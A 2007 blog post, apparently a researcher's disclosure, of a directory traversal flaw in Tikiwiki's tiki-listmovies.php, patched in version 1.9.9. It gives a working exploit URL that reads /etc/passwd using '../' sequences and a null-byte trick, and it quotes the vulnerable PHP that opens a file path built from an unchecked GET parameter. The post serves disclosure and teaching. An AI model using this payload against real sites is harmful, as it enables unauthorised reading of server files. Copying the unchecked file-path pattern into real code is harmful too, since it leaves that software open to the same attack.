jueves, diciembre 27, 2007

Tikiwiki CMS Trasversal Directory

Tikiwiki is a full featured CMS, massively used in the world.
(search on google: tiki-index.php)

18/12/2007 I was auditing the code and found a dangerous vulnerability, that lets a malicious user get any file in the system via web (with the apache user permissions)

Mose and the coders quickly solve the problem and release the 1.9.9 version.
Free software is more secure every day thanks to the quick response of the community.

Exploit explanation:

http://www.vulnsite.com/tiki-listmovies.php?
movie=../../../../../../etc/passwd%001234


Why this 1234 stuff?
well, the last 4 bytes of movie parameter, are erased, and then an .xml extension was appended.
Then tiki-listmovies will erase the "1234" and the null byte will ignore the extension.

Only is possible get the first 1000 bytes of the file.

The vulnerable code:

if(isset($_GET["movie"])) {
$movie = $_GET["movie"];
...

if ($movie) {
// Initialize movie size
$confFile = 'tikimovies/'.substr($movie,0,-4).".xml";

//trc('confFile', $confFile);
$fh = @fopen($confFile,'r');
$config = @fread($fh, 1000);
@fclose($fh);
if (isset($config) && $config <>'') {
$width =
preg_replace("/^.*?(.*?)<\/MovieWidth>.*$/ms", "$1", $config);
$height =
preg_replace("/^.*?(.*?)<\/MovieHeight>.*$/ms", "$1",
$config);
$smarty->assign('movieWidth',$width);
$smarty->assign('movieHeight',$height);
}
}


http://seclists.org/bugtraq/2007/Dec/0284.html
http://info.tikiwiki.org/tiki-read_article.php?articleId=19
http://www.securityfocus.com/bid/27008/info

1 comentario:

Alex dijo...

nice hack, many goverment and important sites uses this software.